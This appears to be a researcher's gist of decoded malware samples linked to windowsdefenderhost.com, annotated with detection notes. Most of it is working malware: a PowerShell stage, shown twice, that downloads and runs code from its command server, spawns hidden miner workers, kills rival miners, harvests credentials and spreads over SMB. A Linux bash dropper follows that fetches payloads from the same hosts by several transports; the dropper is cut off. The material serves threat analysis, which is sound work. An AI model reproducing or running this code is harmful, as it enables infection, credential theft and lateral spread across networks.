@JohnLaTwC
Created September 26, 2018 23:29
update.windowsdefenderhost.com related threats
## Uploaded by @JohnLaTwC
## 5c8fc3b6118f88463f19d21c7f9526d45b40b26b83c74d4e148a6510aeb440de

## decodes to:
# Reviewer note: decoded malicious PowerShell stage, reproduced unmodified for triage;
# the comments describe observable behaviour only (defender's view).
# --- C2 endpoint selection ---
# $se lists the candidate C2 endpoints: the hostname and its hard-coded IP fallback
# (both IoCs on this page). Each is pinged four times; the loop takes the first
# endpoint whose average RTT is non-zero and <= 300 ms (i=0), otherwise the faster
# of the two (i=1). NOTE(review): $se has only two entries, so the i=2/i=3 branches
# index past it ($se[2]/$se[3] are $null) -- presumably remnants of a four-endpoint
# build; confirm before relying on that branch logic.
# Detection: powershell.exe sending ICMP echo to update.windowsdefenderhost.com /
# 111.90.159.149, followed by HTTP to the chosen host on port 443 (see below).
$pin = new-object system.net.networkinformation.ping
$se=@(('update.windowsdefenderhost.com'),('111.90.159.149'))
$avgs = @()
$nic = 'update.windowsdefenderhost.com'
for($i=0;$i -le 3;$i++){
$sum = 0
$count = 0
# Four probes per endpoint; a zero RTT (no usable reply) is left out of the average.
for($j=1;$j -le 4;$j++){
$tmp = ($pin.send($se[$i])).RoundtripTime
if ($tmp -ne 0){
$count += 1
}
$sum += $tmp
}
if ($count -ne 0){
$avgs += $sum/$count
}else{
$avgs += 0
}
# i=0: hostname wins outright if it answers within 300 ms.
if ($i -eq 0){
if (($avgs[0] -le 300) -and ($avgs[0] -ne 0)){
$nic = $se[0]
break
}
}
# i=1: otherwise pick whichever of hostname/IP had the lower average.
if ($i -eq 1){
if ($avgs[1] -ne 0){
if (($avgs[0] -le $avgs[1]) -and ($avgs[0] -ne 0)){
$nic = $se[0]
break
}else{
$nic = $se[1]
break
}
}
}
# i=2 / i=3: same pattern, but $se[2] and $se[3] do not exist in this sample.
if ($i -eq 2){
if (($avgs[2] -le 300) -and ($avgs[2] -ne 0)){
$nic = $se[2]
break
}
}
if ($i -eq 3){
if ($avgs[3] -ne 0){
if (($avgs[2] -le $avgs[3]) -and ($avgs[2] -ne 0)){
$nic = $se[2]
break
}else{
$nic = $se[3]
break
}
}
}
}
# Port 443 is appended to the chosen host, yet the requests below use plain http://.
$nic=$nic+(':'+'443')
# --- Self-update check ---
# Fetches http://<c2>:443/ver.txt and compares it with the 'ver' property stored on
# the WMI class root\default:System_Anti_Virus_Core (the malware keeps its state and
# payload blobs in WMI class properties). On mismatch it downloads antivirus.ps1 from
# the same host, runs it with IEX and stops here.
# Detection: WebClient requests for /ver.txt and /antivirus.ps1 to the C2 host over
# cleartext HTTP on 443; Script Block Logging records the IEX'd content; the WMI
# class name itself is a high-fidelity IoC.
$ver=(New-Object Net.WebClient).DownloadString("http://$nic/ver.txt").Trim()
if($ver -ne $null){
$ver_tmp=([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['ver'].Value
if($ver -ne $ver_tmp){
IEX (New-Object Net.WebClient).DownloadString("http://$nic/antivirus.ps1")
return
}
}
# --- Helper loading and host preparation ---
# $stime bounds the lateral-movement loop further down (5400 s budget).
$stime=[Environment]::TickCount
# 'funs' is a base64 blob stored in the WMI class; decoding and IEX'ing it defines the
# helpers used below (sentfile, RunDDOS, KillBot, Get-creds, Get-networkrange,
# Get-IpInB, Test-Port, test-ip, eb7, eb8, $RemoteScriptBlock). Their bodies are not on
# this page -- every statement about them here is an inference from their call sites.
$funs = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['funs'].Value
$defun=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs))
iex $defun
# Deletes every permanent WMI event subscription binding whose filter name does not
# match 'Windows Events' -- presumably evicting other persistence while keeping its own
# (the surviving binding name is a hunting lead; confirm from the decoded 'funs').
Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Object {$_.filter -notmatch 'Windows Events'} |Remove-WmiObject
# Drops msvcp120.dll / msvcr120.dll (VC++ 2013 runtime file names) into system32 when
# absent via sentfile; the source of the files is not visible here (presumably the C2).
$dirpath=$env:SystemRoot+'\system32'
if (!(test-path $dirpath )){
$dirpath=$env:SystemRoot
}
if (!(test-path ($dirpath+'\msvcp120.dll')))
{sentfile ($dirpath+'\msvcp120.dll') 'vcp'}
if (!(test-path ($dirpath+'\msvcr120.dll')))
{sentfile ($dirpath+'\msvcr120.dll') 'vcr'}
# --- Miner session check, competitor removal, hidden worker spawn ---
# PIDs of all powershell.exe processes, highest CPU first.
[array]$psids= get-process -name powershell |sort cpu -Descending| ForEach-Object {$_.id}
$tcpconn = netstat -anop tcp
$exist=$False
# $exist becomes true when the top-CPU powershell process owns an ESTABLISHED
# connection to a remote :80 or :14444 -- i.e. a worker session is already running
# (14444 matches the pool port in the miner config elsewhere on this page).
if ($psids -ne $null )
{
foreach ($t in $tcpconn)
{
$line =$t.split(' ')| ?{$_}
if ($line -eq $null)
{continue}
if (($psids[0] -eq $line[-1]) -and $t.contains("ESTABLISHED") -and ($t.contains(":80 ") -or $t.contains(":14444")) )
{
$exist=$true
break
}
}
}
# Helpers from 'funs' (not on this page). "taskhoet.exe" looks like a typo-squat of
# taskhost.exe -- a filename worth hunting for. KillBot is passed the WMI class name.
RunDDOS "taskhoet.exe"
KillBot('System_Anti_Virus_Core')
# Force-kills any process with an ESTABLISHED connection to :3333/:5555/:7777 --
# ports commonly used by mining pools -- presumably to remove competing miners.
foreach ($t in $tcpconn)
{
$line =$t.split(' ')| ?{$_}
if (!($line -is [array])){continue}
if (($line[-3].contains(":3333") -or $line[-3].contains(":5555") -or $line[-3].contains(":7777")) -and $t.contains("ESTABLISHED"))
{
$evid=$line[-1]
Get-Process -id $evid | stop-process -force
}
}
# If no worker session exists and at most 8 powershell processes are running, launch a
# hidden powershell (-NoP -NonI -W Hidden) via WScript.Shell.Run(…,0). It reloads
# 'funs' and the 'mon' blob from the WMI class and hands 'mon' to $RemoteScriptBlock;
# the argument pattern resembles PowerSploit's Invoke-ReflectivePEInjection, so 'mon'
# is presumably an in-memory PE (confirm from the decoded 'funs').
# Detection: WScript.Shell-spawned powershell.exe with that exact switch set, and a
# powershell.exe process reading WMI class root\default:System_Anti_Virus_Core.
if (!$exist -and ($psids.count -le 8))
{
$cmdmon="powershell -NoP -NonI -W Hidden `"`$mon = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['mon'].Value;`$funs = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(`$funs)));Invoke-Command -ScriptBlock `$RemoteScriptBlock -ArgumentList @(`$mon, `$mon, 'Void', 0, '', '')`""
$vbs = New-Object -ComObject WScript.Shell
$vbs.run($cmdmon,0)
}
# --- Credential harvesting and lateral movement ---
# 'mimi' is another blob from the WMI class; Get-creds (from 'funs') returns a credential
# list $a and an NTLM flag -- the property name suggests a Mimikatz-derived dumper, but
# that is not visible here.
$NTLM=$False
$mimi = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['mimi'].Value
$a, $NTLM= Get-creds $mimi $mimi
$Networks = [System.Net.DNS]::GetHostByName($null).AddressList
# ipsu / i17: space-separated lists of hosts already handled by the credential path and
# by the m17 path respectively; both are persisted back into the WMI class at the end.
$ipsu = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['ipsu'].Value
$i17 = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['i17'].Value
# 'sc' is a base64 blob passed to eb7/eb8 as raw bytes -- presumably shellcode; the
# helpers are not on this page.
$scba= ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['sc'].Value
[byte[]]$sc=[System.Convert]::FromBase64String($scba)
foreach ($Network in $Networks)
{
$IPAddress = $Network.IPAddressToString
# Skips APIPA (169.254.x.x) interfaces.
if ($IPAddress -match '^169.254'){continue}
# Target set: the local /24 (mask is hard-coded), whatever Get-IpInB returns
# (presumably the enclosing /16 -- confirm), plus the remote peer of every
# ESTABLISHED TCP connection other than loopback.
$SubnetMask = '255.255.255.0'
$ips_c=Get-networkrange $IPAddress $SubnetMask
$ips_b=Get-IpInB $IPAddress
$ips=$ips_c+$ips_b
$tcpconn = netstat -anop tcp
foreach ($t in $tcpconn)
{
$line =$t.split(' ')| ?{$_}
if (!($line -is [array])){continue}
if ($line.count -le 4){continue}
$i=$line[-3].split(':')[0]
if ( ($line[-2] -eq 'ESTABLISHED') -and ($i -ne '127.0.0.1') -and ($ips -notcontains $i))
{
$ips+=$i
}
}
# 5400 s (90 min) overall budget measured from $stime.
if (([Environment]::TickCount-$stime)/1000 -gt 5400){break}
foreach ($ip in $ips)
{
if (([Environment]::TickCount-$stime)/1000 -gt 5400){break}
if ($ip -eq $IPAddress){continue}
# Test-Port's port is defined in 'funs' (not visible). Hosts already in ipsu are skipped.
if ((Test-Port $ip) -ne $false -and $ipsu -notcontains $ip)
{
$re=0
# First path: reuse harvested credentials against the host (test-ip also receives the
# C2 host $nic, so the remote side presumably fetches from it too).
if ($a.count -ne 0)
{$re = test-ip -ip $ip -creds $a -nic $nic -ntlm $NTLM }
if ($re -eq 1){$ipsu =$ipsu +" "+$ip}
else
{
# Second path: PingCastle's m17sc scanner class -- an MS17-010 (SMBv1) check as far as
# the name indicates -- then eb7 / eb8 with the 'sc' bytes; eb8 runs only if eb7 did
# not return $true. The host is recorded in i17 either way.
# Detection: one powershell.exe process sweeping the local /24 on SMB/445 within a
# short window, and repeated reads of the WMI class above.
$vul=[PingCastle.Scanners.m17sc]::Scan($ip)
if ($vul -and $i17 -notcontains $ip)
{
$res=eb7 $ip $sc
if (!($res -eq $true))
{eb8 $ip $sc}
$i17 = $i17 + " "+$ip
}
}
}
}
}
# Persists the updated host lists into the WMI class (fileless state storage).
$StaticClass=New-Object Management.ManagementClass('root\default:System_Anti_Virus_Core')
$StaticClass.SetPropertyValue('ipsu' ,$ipsu)
$StaticClass.Put()
$StaticClass.SetPropertyValue('i17' ,$i17)
$StaticClass.Put()
# Reviewer note: this listing is a verbatim repeat of the decoded PowerShell stage
# earlier on this page; kept unmodified, comments describe observable behaviour only.
# --- C2 endpoint selection ---
# Pings the hostname and its hard-coded IP fallback (both IoCs on this page) four times
# each and takes the hostname if it answers within 300 ms, otherwise the faster of the
# two. NOTE(review): $se has two entries, so the i=2/i=3 branches index past it
# ($null) -- presumably leftovers from a four-endpoint build; confirm.
# Detection: ICMP echo from powershell.exe to update.windowsdefenderhost.com /
# 111.90.159.149, then HTTP to the chosen host on port 443.
$pin = new-object system.net.networkinformation.ping
$se=@(('update.windowsdefenderhost.com'),('111.90.159.149'))
$avgs = @()
$nic = 'update.windowsdefenderhost.com'
for($i=0;$i -le 3;$i++){
$sum = 0
$count = 0
# Four probes per endpoint; zero RTT replies are excluded from the average.
for($j=1;$j -le 4;$j++){
$tmp = ($pin.send($se[$i])).RoundtripTime
if ($tmp -ne 0){
$count += 1
}
$sum += $tmp
}
if ($count -ne 0){
$avgs += $sum/$count
}else{
$avgs += 0
}
# i=0: hostname wins outright if it answers within 300 ms.
if ($i -eq 0){
if (($avgs[0] -le 300) -and ($avgs[0] -ne 0)){
$nic = $se[0]
break
}
}
# i=1: otherwise the lower average of hostname/IP wins.
if ($i -eq 1){
if ($avgs[1] -ne 0){
if (($avgs[0] -le $avgs[1]) -and ($avgs[0] -ne 0)){
$nic = $se[0]
break
}else{
$nic = $se[1]
break
}
}
}
# i=2 / i=3: same pattern, but $se[2] and $se[3] do not exist in this sample.
if ($i -eq 2){
if (($avgs[2] -le 300) -and ($avgs[2] -ne 0)){
$nic = $se[2]
break
}
}
if ($i -eq 3){
if ($avgs[3] -ne 0){
if (($avgs[2] -le $avgs[3]) -and ($avgs[2] -ne 0)){
$nic = $se[2]
break
}else{
$nic = $se[3]
break
}
}
}
}
# ':443' is appended, yet the requests below use plain http://.
$nic=$nic+(':'+'443')
# --- Self-update check ---
# Fetches http://<c2>:443/ver.txt, compares it with the 'ver' property of WMI class
# root\default:System_Anti_Virus_Core and, on mismatch, IEX's antivirus.ps1 from the
# same host and stops. Detection: cleartext HTTP on 443 for /ver.txt and
# /antivirus.ps1; Script Block Logging captures the IEX'd content; the WMI class name
# is a high-fidelity IoC.
$ver=(New-Object Net.WebClient).DownloadString("http://$nic/ver.txt").Trim()
if($ver -ne $null){
$ver_tmp=([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['ver'].Value
if($ver -ne $ver_tmp){
IEX (New-Object Net.WebClient).DownloadString("http://$nic/antivirus.ps1")
return
}
}
# --- Helper loading and host preparation ---
# $stime bounds the scan loop further down (5400 s budget).
$stime=[Environment]::TickCount
# 'funs' (base64, stored in the WMI class) is decoded and IEX'd to define the helpers
# used below (sentfile, RunDDOS, KillBot, Get-creds, Test-Port, test-ip, eb7, eb8,
# $RemoteScriptBlock, …); their bodies are not on this page.
$funs = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['funs'].Value
$defun=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs))
iex $defun
# Removes all permanent WMI subscription bindings whose filter name does not match
# 'Windows Events' -- presumably keeping its own persistence while evicting others
# (confirm the surviving binding name from the decoded 'funs').
Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Object {$_.filter -notmatch 'Windows Events'} |Remove-WmiObject
# Drops msvcp120.dll / msvcr120.dll (VC++ 2013 runtime names) into system32 via
# sentfile when missing; the file source is not visible here.
$dirpath=$env:SystemRoot+'\system32'
if (!(test-path $dirpath )){
$dirpath=$env:SystemRoot
}
if (!(test-path ($dirpath+'\msvcp120.dll')))
{sentfile ($dirpath+'\msvcp120.dll') 'vcp'}
if (!(test-path ($dirpath+'\msvcr120.dll')))
{sentfile ($dirpath+'\msvcr120.dll') 'vcr'}
# --- Miner session check, competitor removal, hidden worker spawn ---
# powershell.exe PIDs, highest CPU first.
[array]$psids= get-process -name powershell |sort cpu -Descending| ForEach-Object {$_.id}
$tcpconn = netstat -anop tcp
$exist=$False
# $exist = the top-CPU powershell process already holds an ESTABLISHED connection to a
# remote :80 or :14444 (14444 matches the pool port in the miner config on this page).
if ($psids -ne $null )
{
foreach ($t in $tcpconn)
{
$line =$t.split(' ')| ?{$_}
if ($line -eq $null)
{continue}
if (($psids[0] -eq $line[-1]) -and $t.contains("ESTABLISHED") -and ($t.contains(":80 ") -or $t.contains(":14444")) )
{
$exist=$true
break
}
}
}
# Helpers from 'funs' (not on this page); "taskhoet.exe" looks like a typo-squat of
# taskhost.exe and is worth hunting for as a filename.
RunDDOS "taskhoet.exe"
KillBot('System_Anti_Virus_Core')
# Force-kills processes with ESTABLISHED connections to :3333/:5555/:7777 (common
# mining-pool ports) -- presumably competing miners.
foreach ($t in $tcpconn)
{
$line =$t.split(' ')| ?{$_}
if (!($line -is [array])){continue}
if (($line[-3].contains(":3333") -or $line[-3].contains(":5555") -or $line[-3].contains(":7777")) -and $t.contains("ESTABLISHED"))
{
$evid=$line[-1]
Get-Process -id $evid | stop-process -force
}
}
# With no worker session and <= 8 powershell processes: spawn a hidden powershell via
# WScript.Shell.Run(…,0) that reloads 'funs' and the 'mon' blob from the WMI class and
# passes 'mon' to $RemoteScriptBlock. The argument list resembles PowerSploit's
# Invoke-ReflectivePEInjection, so 'mon' is presumably an in-memory PE -- confirm.
# Detection: WScript.Shell-spawned powershell.exe with -NoP -NonI -W Hidden, and a
# powershell.exe process reading root\default:System_Anti_Virus_Core.
if (!$exist -and ($psids.count -le 8))
{
$cmdmon="powershell -NoP -NonI -W Hidden `"`$mon = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['mon'].Value;`$funs = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(`$funs)));Invoke-Command -ScriptBlock `$RemoteScriptBlock -ArgumentList @(`$mon, `$mon, 'Void', 0, '', '')`""
$vbs = New-Object -ComObject WScript.Shell
$vbs.run($cmdmon,0)
}
# --- Credential harvesting and lateral movement ---
# Get-creds (from 'funs') turns the 'mimi' blob into a credential list $a plus an NTLM
# flag; the property name suggests a Mimikatz-derived dumper but that is not visible here.
$NTLM=$False
$mimi = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['mimi'].Value
$a, $NTLM= Get-creds $mimi $mimi
$Networks = [System.Net.DNS]::GetHostByName($null).AddressList
# ipsu / i17: space-separated host lists for the credential path and the m17 path;
# both are written back into the WMI class at the end.
$ipsu = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['ipsu'].Value
$i17 = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['i17'].Value
# 'sc' is base64 bytes handed to eb7/eb8 -- presumably shellcode (helpers not visible).
$scba= ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['sc'].Value
[byte[]]$sc=[System.Convert]::FromBase64String($scba)
foreach ($Network in $Networks)
{
$IPAddress = $Network.IPAddressToString
# Skips APIPA interfaces.
if ($IPAddress -match '^169.254'){continue}
# Targets: the local /24 (hard-coded mask), Get-IpInB's result (presumably the
# enclosing /16 -- confirm) and the remote peer of each non-loopback ESTABLISHED
# TCP connection.
$SubnetMask = '255.255.255.0'
$ips_c=Get-networkrange $IPAddress $SubnetMask
$ips_b=Get-IpInB $IPAddress
$ips=$ips_c+$ips_b
$tcpconn = netstat -anop tcp
foreach ($t in $tcpconn)
{
$line =$t.split(' ')| ?{$_}
if (!($line -is [array])){continue}
if ($line.count -le 4){continue}
$i=$line[-3].split(':')[0]
if ( ($line[-2] -eq 'ESTABLISHED') -and ($i -ne '127.0.0.1') -and ($ips -notcontains $i))
{
$ips+=$i
}
}
# 5400 s (90 min) budget from $stime.
if (([Environment]::TickCount-$stime)/1000 -gt 5400){break}
foreach ($ip in $ips)
{
if (([Environment]::TickCount-$stime)/1000 -gt 5400){break}
if ($ip -eq $IPAddress){continue}
# Test-Port's port lives in 'funs'; hosts already in ipsu are skipped.
if ((Test-Port $ip) -ne $false -and $ipsu -notcontains $ip)
{
$re=0
# Path 1: harvested credentials via test-ip (also given the C2 host $nic).
if ($a.count -ne 0)
{$re = test-ip -ip $ip -creds $a -nic $nic -ntlm $NTLM }
if ($re -eq 1){$ipsu =$ipsu +" "+$ip}
else
{
# Path 2: PingCastle m17sc scan (an MS17-010/SMBv1 check by name), then eb7 and,
# if eb7 did not return $true, eb8, both with the 'sc' bytes; host recorded in i17.
# Detection: a single powershell.exe sweeping the local /24 on 445 in a short window.
$vul=[PingCastle.Scanners.m17sc]::Scan($ip)
if ($vul -and $i17 -notcontains $ip)
{
$res=eb7 $ip $sc
if (!($res -eq $true))
{eb8 $ip $sc}
$i17 = $i17 + " "+$ip
}
}
}
}
}
# Persists the updated host lists into the WMI class (fileless state storage).
$StaticClass=New-Object Management.ManagementClass('root\default:System_Anti_Virus_Core')
$StaticClass.SetPropertyValue('ipsu' ,$ipsu)
$StaticClass.Put()
$StaticClass.SetPropertyValue('i17' ,$i17)
$StaticClass.Put()
## 3744a4ccde946fd7bb266fc7c9aaaa17044e272d80b085230f8a005e97177cf9
#!/bin/bash
# _ooOoo_
# o8888888o
# 88" . "88
# (| -_- |)
# O\ = /O
# ____/`---'\____
# .' \\| |// `.
# / \\||| : |||// \
# / _||||| -:- |||||- \
# | | \\\ - /// | |
# | \_| ''\---/'' | |
# \ .-\__ `-` ___/-. /
# ___`. .' /--.--\ `. . __
# ."" '< `.___\_<|>_/___.' >'"".
# | | : `- \`.;`\ _ /`;.`/ - ` : | |
# \ \ `-. \_ __\ /__ _/ .-` / /
#======`-.____`-.___\_____/___.-`____.-'======
# `=---='
#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
# Audentes fortuna iuvat
#---------------------------------------------
# Reviewer note: Linux dropper stage, reproduced unmodified for triage; comments are
# analysis only. Globals below are read by the functions that follow.
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
DownloadPath=""          # first writable+executable directory found by init()
CFIM=""                  # integrity-check mode chosen by init(): "md5" or "size"
CFIM_DC_ELF_VALUE=""     # expected md5/size of the dc ELF for this arch
CFIM_DC_CODE_VALUE=""    # expected md5/size of the dc C source
CFIM_FS_ELF_VALUE=""     # expected md5/size of the fs ELF
DC_ELF_DOWNLOAD_URL=""   # 32- or 64-bit dc ELF URL, set by init()
dc_name="dc_name"        # on-disk file names of the two helper binaries (IoCs)
fs_name="fs_name"
ver=64
arg=$1                   # path re-launched via the helpers in fuckit() and deleted by clearnup()
root_path="/tmp/"        # where the marker files aW1yb290.dat / aW1yb291.dat are expected
# Payload URLs: cache.windowsdefenderhost.com (IP fallback 111.90.159.149) -- IoCs from
# this page. The sizes / MD5s are the values DownloadFile() greps for.
dc_elf_32="http://cache.windowsdefenderhost.com/linux/dc_elf_32"
dc_elf_64="http://cache.windowsdefenderhost.com/linux/dc_elf_64"
fs_elf_64="http://cache.windowsdefenderhost.com/linux/fs_elf_64"
dc_code_url="http://cache.windowsdefenderhost.com/linux/dc_code"
dc_code_size="4429"
dc_code_md5="2d2c28c1efdfd7e20c9f4cae9c538edb"
dc_32_elf_size="8812"
dc_64_elf_size="11002"
fs_elf_size="13413"
fs_elf_md5="ff1e9d1fc459dd83333fd94dbe36229a"
dc_32_elf_md5="223413a49175bef38b9d5d10b9cff3f7"
dc_64_elf_md5="42ce5d5179304407b2c0197b78e5b7b0"
remote_ip="111.90.159.149"
remote_host="cache.windowsdefenderhost.com"
remote_port="80"
#######################################
# Picks hostname vs. raw-IP download URLs.
# Sends one ICMP echo to $remote_host and, if the "PING" banner is absent (DNS or ICMP
# failure), rewrites every URL and $remote_host to the hard-coded IP.
# Globals written: remote_host, dc_elf_32, dc_elf_64, fs_elf_64, dc_code_url
# Detection: DNS lookup of cache.windowsdefenderhost.com or ICMP to 111.90.159.149
# from a shell, followed by HTTP GETs for /linux/dc_elf_*, /linux/fs_elf_64, /linux/dc_code.
#######################################
function CheckNetwork() {
temp=`ping $remote_host -c1 | grep PING | awk '{ print $3 }'`
if [[ "$temp" = "" ]] ;then
remote_host=$remote_ip
dc_elf_32="http://111.90.159.149/linux/dc_elf_32"
dc_elf_64="http://111.90.159.149/linux/dc_elf_64"
fs_elf_64="http://111.90.159.149/linux/fs_elf_64"
dc_code_url="http://111.90.159.149/linux/dc_code"
fi
}
#######################################
# Host fingerprinting and staging-directory choice.
# 1. Word size from `getconf LONG_BIT`, falling back to i386/i686 in `uname -r`.
# 2. DownloadPath = first entry of FileWritePathArray that is r/w/x for the current
#    user; the order prefers system directories (/usr/bin, /bin, /lib, /boot) over
#    /tmp, $HOME and the cwd, so a root-run instance stages into /usr/bin.
#    NOTE: root_path is preset to "/tmp/", so the elif branch never runs.
# 3. CFIM = "md5" if md5sum exists, else "size" (ls -l length) -- the values are then
#    chosen per arch from the globals above.
# Detection: new files dc_name / fs_name / dc_name.c in any of those directories.
#######################################
function init() {
temp=`getconf LONG_BIT`
if [ $? -eq 0 ];then
if [ "$temp" == '64' ];then
ver=64
else
ver=32
fi
else
temp=`uname -r`
if [ $? -eq 0 ];then
if [[ "$temp" =~ "i386" ]] || [[ "$temp" =~ "i686" ]] ;then
ver=32
else
ver=64
fi
fi
fi
temp=""
temp=`whoami`
temps=`pwd`
FileWritePathArray=("/usr/bin/" "/bin/" "/lib/" "/boot/" "/tmp/" "/home/$temp/" "$temps/")
for path in ${FileWritePathArray[@]}
do
if [ -x $path ] && [ -r $path ] && [ -w $path ]; then
DownloadPath=$path
break
elif [ "$root_path" = "" ];
then
root_path=$path
fi
done
# Integrity-check mode: md5 when md5sum is available, otherwise file size.
md5sum --help >/dev/null 2>&1
if [ "$?" = "0" ]; then
CFIM="md5"
CFIM_DC_CODE_VALUE="$dc_code_md5"
CFIM_FS_ELF_VALUE="$fs_elf_md5"
if [ "$ver" -eq 32 ]; then
CFIM_DC_ELF_VALUE="$dc_32_elf_md5"
else
CFIM_DC_ELF_VALUE="$dc_64_elf_md5"
fi
else
CFIM="size"
CFIM_DC_CODE_VALUE="$dc_code_size"
CFIM_FS_ELF_VALUE="$fs_elf_size"
if [ "$ver" -eq 32 ]; then
CFIM_DC_ELF_VALUE="$dc_32_elf_size"
else
CFIM_DC_ELF_VALUE="$dc_64_elf_size"
fi
fi
if [ "$ver" -eq 32 ]; then
DC_ELF_DOWNLOAD_URL="$dc_elf_32"
else
DC_ELF_DOWNLOAD_URL="$dc_elf_64"
fi
}
#######################################
# Downloads one URL with one transport.
# Arguments: $1 transport ("wget"|"curl"|"python"|"php"|"ruby"|"tcp"), $2 URL, $3 output path
# Globals read: remote_host, remote_port (tcp mode)
# wget/curl: if the tool is not on PATH it copies /usr/bin/<tool> (or `which <tool>`)
# into the cwd, runs that copy, and deletes it -- a transient ./wget or ./curl in an odd
# directory is a detection artefact. python/php/ruby are one-liner fetches. "tcp" is a
# hand-rolled HTTP/1.0 GET over bash's /dev/tcp with a fixed User-Agent
# ("Mozilla/5.0 Chrome/39.0.2171.99 Safari/537.36") -- a usable network signature.
# Every output file is chmod 755.
#######################################
function DownloadMode() {
case "$1" in
"wget" )
download_temp=""
wget --help >/dev/null 2>&1
if [ "$?" = "0" ]; then
wget -c -O $3 $2 >/dev/null 2>&1
chmod 755 $3 >/dev/null 2>&1
else
if [ -f "/usr/bin/wget" ]; then
download_temp="/usr/bin/wget"
else
which --help >/dev/null 2>&1
if [ "$?" = "0" ]; then
download_temp="`which wget`"
fi
fi
if [ "$download_temp" != "" ]; then
# Temporary copy of the binary in the cwd, removed after use.
cp $download_temp . >/dev/null 2>&1
chmod +x wget >/dev/null 2>&1
./wget -c -O $3 $2 >/dev/null 2>&1
chmod 755 $3 >/dev/null 2>&1
rm -f wget
fi
fi
;;
"curl" )
download_temp=""
curl --help >/dev/null 2>&1
if [ "$?" = "0" ]; then
curl -o $3 $2 >/dev/null 2>&1
chmod 755 $3 >/dev/null 2>&1
else
if [ -f "/usr/bin/curl" ]; then
download_temp="/usr/bin/curl"
else
which --help >/dev/null 2>&1
if [ "$?" = "0" ]; then
download_temp="`which curl`"
fi
fi
if [ "$download_temp" != "" ]; then
cp $download_temp . >/dev/null 2>&1
chmod +x curl >/dev/null 2>&1
./curl -o $3 $2 >/dev/null 2>&1
chmod 755 $3 >/dev/null 2>&1
rm -f curl
fi
fi
;;
"python" )
# Python 2 only (urllib.urlretrieve); the URL/path are interpolated into the -c string.
python -V >/dev/null 2>&1
if [ "$?" = "0" ]; then
python -c "import urllib;urllib.urlretrieve(\"$2\", \"$3\")"
chmod 755 $3
fi
;;
"php" )
php --help >/dev/null 2>&1
if [ "$?" = "0" ]; then
php -r '$f=fopen("'$3'","w");fwrite($f, implode("",@file("'$2'")));fclose($f);'
chmod 755 $3
fi
;;
"ruby" )
ruby --help >/dev/null 2>&1
if [ "$?" = "0" ]; then
ruby -e "require 'open-uri';File.open('$3', 'w') {|f| f.write(open('$2') {|f1| f1.read})}"
chmod 755 $3
fi
;;
"tcp" )
# Raw socket to $remote_host:$remote_port on fd 9 (bash /dev/tcp -- no external tool).
exec 9<> /dev/tcp/$remote_host/$remote_port
if [ $? -eq 0 ]; then
curr_file_len=0
idx=0
[ -f $3 ] && rm -f $3 || touch $3
# Request path = URL with the "http://host:port/" prefix stripped.
tmp=${2//"http://$remote_host:$remote_port/"/""};
echo -e "GET /$tmp HTTP/1.0\r\nHost: $remote_host:$remote_port\r\nConnection: keep-alive\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/5.0 Chrome/39.0.2171.99 Safari/537.36\r\n\r\n" >&9
if [ $? -eq 0 ]; then
# Reads response headers until the blank (CR-only) line, capturing Content-Length.
while read -u 9 -t 30 line
do
[ ${#line} -eq 1 ] && break
result=$(echo "$line" | grep "Content-Length:")
if [ "$result" != "" ]; then
remote_file_len=${line//"Content-Length: "/""};
fi
done
# Drops the trailing CR from the header value.
tmp=${#remote_file_len}; ((tmp--))
remote_file_len=${remote_file_len:0:$tmp}
# Body copied in 1 KiB dd chunks until curr_file_len exceeds Content-Length.
while [ $curr_file_len -le $remote_file_len ]
do
`dd bs=1024 count=1 of=$3 seek=$idx <&9 2>/dev/null`
((idx++))
curr_file_len=$((idx*1024))
done
# `>&9-` duplicates fd 9 onto stdout and then closes fd 9 (as written, this leaves the
# shell's stdout attached to the socket for the rest of the run).
exec >&9-
chmod 755 $3
fi
fi
;;
esac
}
#######################################
# Fetches a payload, trying each transport in turn until the integrity check passes.
# Arguments: $1 check mode ("md5"|"size"), $2 expected md5 or byte size, $3 URL, $4 output path
# The file is deleted before every attempt; the check is a substring grep of $2 in
# `md5sum` or `ls -l` output.
# Returns: 1 when a download matched (note the inverted convention), 0 when every
# transport failed. The callers in fuckit() do not inspect this status.
#######################################
function DownloadFile() {
Dmode=("wget" "curl" "python" "php" "ruby" "tcp")
for mode in ${Dmode[@]}
do
rm -f "$4"
DownloadMode "$mode" "$3" "$4"
if [ -f "$4" ]; then
if [ "$1" = "md5" ]; then
res=`md5sum "$4"`
else
res=`ls -l "$4"`
fi
result=$(echo "$res" | grep "$2")
if [ "$result" != "" ]; then
return 1
fi
fi
done
return 0
}
#######################################
# Obtains the two helper binaries and uses them to re-launch $arg.
# - With gcc present: downloads the dc C source to $DownloadPath/dc_name.c and builds it
#   with -pthread; if the build fails, falls back to the prebuilt dc ELF. fs_name is
#   always the prebuilt ELF.
# - Each helper is fed shell commands on stdin ("echo fuckedall > <marker>"); if the
#   marker file then exists, the helper is treated as working and is fed a second
#   command that copies $arg to $DownloadPath/just4run and executes it detached.
#   The marker name aW1yb290 is base64 for "imroot", which together with the CentOS
